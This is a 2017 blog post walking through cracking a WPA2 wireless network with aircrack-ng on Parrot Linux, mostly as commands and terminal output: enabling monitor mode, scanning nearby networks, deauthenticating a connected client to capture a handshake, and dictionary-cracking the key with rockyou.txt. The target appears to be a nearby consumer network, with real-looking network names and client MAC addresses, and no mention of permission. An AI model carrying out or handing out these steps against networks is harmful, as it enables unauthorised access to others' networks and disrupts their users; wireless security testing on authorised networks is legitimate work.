Cracking a WPA2 network with aircrack-ng and Parrot.

Posted: August 23, 2017. At: 2:36 PM. This was 6 months ago. Post ID: 11250
Page permalink.
WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters. These cookies expire two weeks after they are set.

Starting a USB wireless interface in monitor mode.

┌─[root@parrot][/home/jason]
└──╼ #airmon-ng start wlan1
 
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
  593 NetworkManager
  749 wpa_supplicant
  923 dhclient
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1	wlan1		rt73usb		Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
 
		(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
		(mac80211 station mode vif disabled for [phy1]wlan1)

Now we need to list all wireless networks to find the one we wish to attack.

┌─[root@parrot][/home/jason/Documents]
└──╼ #airodump-ng wlan1mon

I got this output.

 CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                          
 E0:B9:E5:B8:31:BB  -39       30        0    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                         
 E0:B9:E5:6E:D3:69  -77       29        0    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                         
 F4:6B:EF:B8:E9:27  -78       17        0    0  11  54e  WPA2 CCMP   PSK  OPTUS_B8E926                                                          
 FA:AB:05:CF:98:E2  -85        2        0    0   6  54e  OPN              Telstra Air                                                           
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                       
 
 00:25:00:FF:94:73  82:FC:02:C5:6D:52  -79    0 -12      0       10                                                                              
 F4:6B:EF:B8:E9:27  A0:2C:36:E3:CD:C1  -81    0 - 1      0        8                                                                              
 F4:6B:EF:B8:E9:27  F0:C7:7F:78:19:D5  -83    0 - 1      0        1

Select a wireless network access point MAC address and then we are ready to begin attacking the access point.

┌─[root@parrot][/home/user]
└──╼ #airodump-ng --bssid E0:B9:E5:6E:D3:69 -c 6 --write password wlan1mon
 CH  6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:6E:D3:69  -77 100     2540      137    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                     
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
 
 E0:B9:E5:6E:D3:69  68:64:4B:2A:10:18  -83    2e- 1      0     1600

There are clients on the wireless network, we can begin to assist the attack by kicking off a client.

Sending a deauth in a separate terminal window to a wireless client to disconnect them and capture a WPA handshake.

┌─[root@parrot][/home/jason]
└──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon
08:19:14  Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6
08:19:14  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs]
08:19:15  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs]

The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.

Now I am trying to crack the wireless Pre Shared Key with a wordlist.

┌─[root@parrot][/home/jason]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

This is what it looks like. But the passkey needs to be in the wordlist to crack it.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:27] 45676/9822768 keys tested (1715.21 k/s) 
 
      Time left: 1 hour, 35 minutes, 0 seconds                   0.47%
 
                       Current passphrase: lovinhim1                  
 
 
      Master Key     : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37 
                       A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04 
 
      Transient Key  : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80 
                       65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A 
                       F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA 
                       B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41 
 
      EAPOL HMAC     : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39

This attack will work once a client is successfully kicked off the network, then they will reconnect to it and the handshake can be captured to a file automatically. This is a great way to crack a wireless network, but the only hard part is cracking the Pre Shared Key. That requires a massive wordlist that can be used against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, then the Pre Shared Key can be cracked.

No comments have been made. Use this form to start the conversation :)

Leave a Reply